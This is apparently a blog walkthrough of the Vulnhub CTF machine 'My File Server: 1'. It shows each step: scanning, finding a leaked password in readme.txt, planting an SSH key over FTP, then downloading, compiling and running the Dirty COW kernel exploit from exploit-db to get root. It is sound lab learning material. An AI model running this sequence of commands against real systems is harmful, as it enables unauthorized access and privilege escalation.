My File Server: 1 Walkthrough Vulnhub CTF

Vulnhub CTF

I will share with you a new Walkthrough for Vulnhub machines. My File Server: 1 This CTF machine is Created by Akanksha Sachin Verma You can download here this CTF

Netdiscover can be used to discover the ALL IP address.

netdiscover
My File Server: 1 Walkthrough

Scanning our target Ip with Nmap basic scan using ( -p parameter ) all port scanning

nmap -A  -p- 192.168.1.9
My File Server: 1 Walkthrough

Our scanning Nmap scanning is complete and we target many ports open 21 ftp, 22 ssh, 80 http, 445 smb, etc.

My File Server: 1 Walkthrough vulnhub
Enumeration

After having read the results from the scan I go for the http service first. On the browser, I see H2 hading

Simple scanning with Nikto And we see a /readme.txt file

nikto --url http://192.168.1.9/
My File Server: 1 Walkthrough vulnhub

Nikto scan we found a file readme.txt I open the file browser and we see a massage readme.txt file ( My Password is rootroot1 )

192.168.1.9/readme.txt
My File Server: 1 Walkthrough vulnhub
Smbmap

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents,

smbmap -H 192.168.1.9
My File Server: 1 Writeup vulnhub
  • username: smbuser
  • password: rootroot1

I try to log this username and password for ssh and we see an error message public key

Generating a new ssh authorized_keys

ssh-keygen -b 2048
My File Server: 1 writeup vulnhub

log in with ftp same username and password

  • username: smbuser
  • password: rootroot1
ftp 192.168.1.9

Creating a .ssh directory

mkdir .ssh

uploading the public key target home directory put command to upload authorized_keys

put /root/.ssh/id_rsa.pub authorized_keys
My File Server: 1 Walkthrough vulnhub

again login ssh and I successfully login with ssh without password

ssh smbuser@192.168.1.9

we see our target is system kernel version is vulnerable I search exploit google and I found a Linux Kernel 2.6.22 < 3.9 (x86/x64) – ‘Dirty COW /proc/self/mem’ Race Condition Privilege Escalation

uname -r

cd /tmp
wget https://www.exploit-db.com/download/40616 -O exploit.c

After download our exploit we need to compile this c file into an executable file

gcc -o kernal-exploit -pthread exploit.c

adding permission executable our exploit

cdmod +x kernal-exploit

this is the last step now run the exploit

./kernal-exploit
cd /root

ls
cat proof.txt
Sar: 1 walkthrough Vulnhub CTF

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

2 Comments on “My File Server: 1 Walkthrough Vulnhub CTF”

Leave a Reply

Your email address will not be published. Required fields are marked *